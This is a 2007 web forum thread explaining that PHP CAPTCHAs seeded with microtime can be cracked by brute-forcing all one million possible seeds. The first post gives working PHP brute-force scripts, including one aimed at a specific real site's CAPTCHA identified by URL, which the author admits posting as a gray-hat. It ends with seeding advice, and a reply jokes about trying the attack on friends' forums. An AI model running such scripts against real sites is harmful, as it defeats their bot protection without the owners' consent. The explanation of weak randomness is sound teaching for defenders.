Old 02-06-2007   #1 (permalink)
Contributing Member
 
Join Date: Jun 2006
Posts: 607
Rep Power: 3
Default PHP rand: A Look at Security

Hey guys,

I work a lot with web applications, leveraging a few technologies one of which is PHP. Every so often there is a need for random data within a web application, reasons could include generating a password or unique id, generating a temporary filename or generating a CAPTCHA image.

For the purpose of this post I am going to focus on the CAPTCHA use.

What is a CAPTCHA?
CAPTCHA stands for 'Completely Automated Public Turing Test to tell Computers and Humans Apart'. You might best know them as 'Type what you see in this above image' tests. Now ignoring an attack using text recognition, I want to talk about an attack on this through rand and srand.

First a brief on PRNG. Psuedo Random Number Generators generate sequences of (psuedo) random numbers. They start with an initial seed and from there generate random numbers. One thing to remember is that the same PRNG algorithm with the same seed will generate the same sequence of random numbers (we shall use this in our attack). Therefor you must pick a seed with a strong degree of randomness for the PRNG, otherwise as the seed is one of the weakest points, your rand is less... rand..

Ok so in php we have the function srand() which sets the seed for our PRNG and then we have sucessive calls to rand() which allows us to extract random numbers.

*** NOTE ***
As of php 4.2 the random number generator is automatically seeded for you, however applications gennerally do one of 2 things:
1) They still srand()
2) They check the version of PHP and will srand() for versions < 4.2

So clearly we apply this attack to apps that use srand (there is a caveat). Oh yes, also the way PHP automatically seeds a rand is with the following macro:

#define GENERATE_SEED() ((long) (time(0) * getpid() * 1000000 * php_combined_lcg(TSRMLS_C)))

Now, I have not had a chance to look at this (too much uni work)
but it sufferes from the flaw that time(0) is predictable, getpid() has a very small space and looking at the code php_combined_lcg relies on the PID and system time ASWELL!)

***

Now it is suggested, and most developers abide by this suggestion that you seed your rand using:

(double) microtime() * 1000000

This is a bad idea as it relies on the system clock, a highly predictable and accessible number.
Also, It is misleading, microtime returns the sys time to within a a millionth, which is horrible (our search space is only 1,000,000 values!!! (TINY)).

Now whats the attack?

Simple, we can seed the rand from 0 .. 999999 and one of them will be the correct seeds. (It actually may get better, I wonder if all of those values have an even distribution, because I'm guessing they don't).
Once we have done this, we can then check the output of rand() from successive calls. For example say the following code generates a random string for a CAPTCHA image and then generates a unique MD5 hash from it:

PHP Code:
<?php
// Standard way people are suggested to seed the rand in php (pre 4.2)
srand(microtime() * 1000000);

$hash md5 (rand());

// Create a random string
$string '';

$available 'ABCDEFGHJKLMNPRSUVWXYZ23456789';
for (
$i 0$i 5$i++)
  {
    
$string .= $available[rand (0, (strlen ($available) - 1))];
  }

echo 
'String: '.$string."\n";
echo 
'Hash: '.$hash;

?>
Now the idea is we know the $hash but not the $string... how can we determine it?... Like this:
PHP Code:
<?php
/*
 * Microtime only so accurate
 * 0.xxxxxx00
 * Means we check 1,000,000 values
 *
 * A common format of seeding the rand is microtime() * 1000000
 * This reduces microtime to 1,000,000 values 000000 - 999999
 * so that means we want to check all 1,000,000
 */
$md5 '3f0d74d70f574dafb255cd3efd0163ef';
for(
$i 0$i 1000000$i++)
{
        
srand($i);
        
$x md5(rand());
        if(
$x == $md5) {
                echo 
'Hash Found...'."\n";
                
// Figure out the Random String
                
$string '';
                
$available 'ABCDEFGHJKLMNPRSUVWXYZ23456789';
                for (
$i 0$i 5$i++)
                {
                    
$string .= $available[rand (0, (strlen ($available) - 1))];
                }
                echo 
'String: '.$string;
                echo 
"\n";
                break;
        }
}
?>
And there, by brute forcing the seed space, we have found the original string.

Now, I have actually found an example of a poor CAPTCHA, and as I'm slightly tinged (read: gray) hatted I AM going to post it ( Admin digression if they want to edit this part of my post )

*** A Real Attack ***

The following captcha can be attacked with our approach (actually an even easier attack exists, but thats a little to easy, so ill let you figure that on out yourself).

The following image is an example of the catpcha i was talking about:
http://lansuite.orgapage.de/ext_scripts/captcha.php

when this image is loaded it sets a cookie on your machine with its very own captcha ID. We can take this and work backwards. The following code will do this for the captcha summplied:

PHP Code:
<?php

/*
http://lansuite.orgapage.de/?mod=picgallery&action=show&step=2&file=/sitzplan.png&page=0
http://lansuite.orgapage.de/ext_scripts/captcha.php
*/

$md5 $argv[1];
for(
$i 0$i 1000000$i++)
{
        
srand($i);
        
$x md5(rand(1000,99999));
        
$x substr($x05);
        
$y strtoupper($x);
        
$x md5($y);
        if(
$x == $md5) {
                echo 
'Hash Found...'."\n";
                
// Figure out the Random String
                
$string $y;
                echo 
'String: '.$string;
                echo 
"\n";
                break;
        }
}
?>
N.B. PHP uses common C functions for its rand so we can actually write a C program to do this... which would also run faster.

Suggestions to be Safe
Ok guys, now about prevention, firstly use mt_rand, it is a stronger more random algorithm. But as you have seen, even if you did you would still fall from this attack. You need to at least attempt to have a strong seed, and this is VERY hard to do. clearly using pid's and times are horrible but we dont gennerally have access to much else.

I guess my suggestion would be this.

Every hour? maybe seed a random number generator ( a strong one ) with a good seed. This seed could be composed of system microtime, system time, system date and pid (yes i know, this is weak) WITH some added data maybe network data, uptime, users logged in, network activity, cpu activity, hard drive seek times, network latency and bandwidth (again, all not so good). And lastly with some good data:
maybe data from http://www.fourmilab.ch/hotbits/ which is based on radiactive decay.

Once you have this seed, seed a strong PRNG and then pull sequences either directly out of this or seed another PRNG with values from this PRNG.

I hope this has opened some eyes.

Cheers, Now im off to san fransisco WWDC!
__________________
92% of teens have moved on to rap. If you are part of the 8% who still listen to real music, copy and paste this into your signature.

Last edited by Khaless; 02-06-2007 at 05:17 PM..
Khaless is offline   Reply With Quote
Old 02-06-2007   #2 (permalink)
Pro Member
 
chemicalNova's Avatar
 
Join Date: Jun 2006
Age: 19
Posts: 5,593
Rep Power: 8
Default

Nice read. Interesting how web developers actually have to take into account how psuedo-random generators aren't foolproof.. for games it doesn't really matter

Have fun at the convention.. lucky bastard

chem
__________________
There are no stupid questions... but there are alot of inquisitive idiots.
-
chemicalNova is offline   Reply With Quote
Old 03-06-2007   #3 (permalink)
GotGames Ninja Admin
 
Twelve-60's Avatar
 
Join Date: May 2006
Location: NSW, Australia
Age: 20
Posts: 2,282
Rep Power: 5
Send a message via MSN to Twelve-60
Default

Yeah that was interesting, I heard a bit about it but never really looked much into it, time to spam my friends home-made-forums

.. for security notice purposes only.

- Twelve-60
__________________
Twelve-60 is online now   Reply With Quote
Reply

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On


All times are GMT +10. The time now is 10:01 AM.


Powered by vBulletin® Version 3.7.5
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.2.0